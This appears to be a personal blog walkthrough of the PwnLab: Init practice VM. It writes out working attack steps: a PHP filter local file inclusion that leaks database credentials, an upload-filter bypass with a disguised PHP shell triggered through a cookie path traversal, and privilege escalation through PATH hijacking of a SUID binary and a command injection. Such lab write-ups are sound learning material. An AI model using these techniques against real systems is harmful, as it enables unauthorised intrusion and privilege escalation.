Pwnlab_Init

A scan shows 3 ports open, 80 (HTTP), 111 (RPCBind), and 3306 (MySQL)

pwn6.PNG

Look at the website shows a simple website with a login and upload page.

pwn2

With MySQL running in the background, this screams SQLi test. So I click on the Login page and capture a request via Burp and run it through SQLMap

pwn1

 

sqlmap -r capture.txt --dbs --threads 10 --level 5 --risk 3

however even with –level5 and –risk 3 set, it found nothing. Next I ran it through Nikto and it found login.php. I once again captured the request via Burp and sent it through SQLMap with level 5 and risk 3. However, still nothing.

I looked back at my Nikto scan and saw config.php was listed.

pwn3

Going there shows just a blank page. After some Googling as to why the config.php file would be blank along with the term ‘vulnerabilities’ I stumble upon this article from exploit-db suggesting local file inclusion. Reading more about LFI and found this article talking about reading the source code from files via LFI. I try this on Index.php and config.php

curl http://192.168.28.215/index.php?page=php://filter/convert.base64-encode/resource=config

I get a response that looks base-64 encoded.

pwn4

Decrypting it shows Mysql credentials!

pwn5

With the command

mysql -u root -h 192.168.28.215 -p

and password

H4u%QJ_H99

I’m now logged into MySQL. I then list the DBs, Users and enumerate the user table.

pwn7.PNG

Decoding the password (base64) for mike reveals it’s

SIfdsTEn6I

I then go back to the login form on the site and login with mike’s credentials. I also tried all 3 credentials on /login.php but it didn’t work. So now I was able to upload files. Right off the bat I tried to upload a .php shell, but it didn’t allow the .php extension.

pwn8

So I had to do it the hard way via modifying the request.

First I make a text file with a gif extension, called shell.gif. I upload that and intercept the request via Burp. I modify the contents to then add the gif header and PHP codepwn10

And as proof, the broken image icon as shown below:

pwn9

Looking at the /uploads/ directory shows that it was renamed to it’s MD5 hash

pwn11

To activate the shell, I set up my listener and take advantage of the LFI vulnerability in the index.php that I found by doing the same LFI exploit but on index

http://192.168.28.215/?page=php://filter/convert.base64-encode/resource=index

The contents again is encryptedpwn13

Decrypting it shows the following:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
 include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
 if (isset($_GET['page']))
 {
 include($_GET['page'].".php");
 }
 else
 {
 echo "Use this server to upload and share image files inside the intranet";
 }
?>
</center>
</body>
</html>

With the bad piece of code being

{
 include("lang/".$_COOKIE['lang']);
}

So, to activate my shell I captured my request to the main page via Burp and edit it as shown below

pwn12

The bit I added was

;lang=../upload/md5hashofthe.gif

Forwarding the request then gets me a shell

pwn14.PNG

I then spawn a TTY shell

python -c 'import pty;pty.spawn("/bin/bash")'

and try switching to one of the users whose credentials I found in the SQL dump. Eventually I try the user ‘kane’ which works.

Now that I’m in as cane I do some enumeration and I find a file called msgmike that’s actually a binary. I execute it and it tries to cat a file called msg.txt

pwn16.PNG

Looking at the permissions of the binary, it shows that the SUID is set! pwn17

Trying to login as Mike doesn’t work, so the next solution is to edit some PATH variables. I first make a file called “cat” and write in it

echo "/bin/sh" > cat

I edit the permissions on  the file so anyone can execute it, via chmod 777 and then I edit the path variable

export PATH=.:$PATH

Finally I run the binary and it successfully executes and I am now user Mike

pwn18

I check Mike’s directory and there’s a binary called msg2root. Executing this asks for a message to root so I just try and see if it will execute /bin/sh as root and it doesn’t. I then try strings on it and see that it’s echoing the message into a file called messages.txt then executing them if delimited with a semi colon.

pwn21

I then type root; /bin/sh and sure enough, it executes

pwn20

pwn19

Overall this was the hardest VM i’ve done to date and I did have to cheat a few times because I was not proficient in LFI at all, but at the end of the day that’s what this blog is for — for me to log how to solve things so I’ll remember it better. Simply just reading a write up for me won’t do me any good.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: